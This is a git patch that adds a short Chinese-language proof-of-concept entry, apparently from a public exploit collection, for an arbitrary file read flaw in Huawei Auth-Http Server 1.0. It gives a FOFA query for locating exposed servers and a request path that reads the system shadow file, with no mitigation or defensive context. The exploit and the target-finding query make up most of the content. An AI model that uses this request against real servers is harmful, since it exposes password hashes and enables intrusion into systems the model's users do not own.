From 874248e5cd3da146534a81ea56996f6cccacb214 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Fri, 24 Nov 2023 19:24:32 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E5=8D=8E=E4=B8=BAAuth-Http=20Serve?=
 =?UTF-8?q?=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=E8=AF=BB=E5=8F=96.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 华为Auth-Http Serve任意文件读取.md | 14 ++++++++++++++
 1 file changed, 14 insertions(+)
 create mode 100644 华为Auth-Http Serve任意文件读取.md

diff --git a/华为Auth-Http Serve任意文件读取.md b/华为Auth-Http Serve任意文件读取.md
new file mode 100644
index 0000000..c18771a
--- /dev/null
+++ b/华为Auth-Http Serve任意文件读取.md	
@@ -0,0 +1,14 @@
+
+## 华为Auth-Http Serve任意文件读取
+华为Auth-Http服务,华为Auth-Http Server是一款安全认证服务器，在提供安全的远程登录和网络资源访问控制。支持多种认证方式和协议AAA、Radius、TACACS+等，可以实现用户身份认证、授权和审计等功能。同时，可广泛应用于企业、政府、教育等行业的安全架构中。华为Auth-Http Server 1.0任意文件读取，攻击者可通过该漏洞读取任意文件
+## fofa
+```
+server="Huawei Auth-Http Server 1.0"
+```
+
+## POC
+```
+/umweb/shadow
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/6e52e737-0076-4630-9d6f-a9f0a355b549)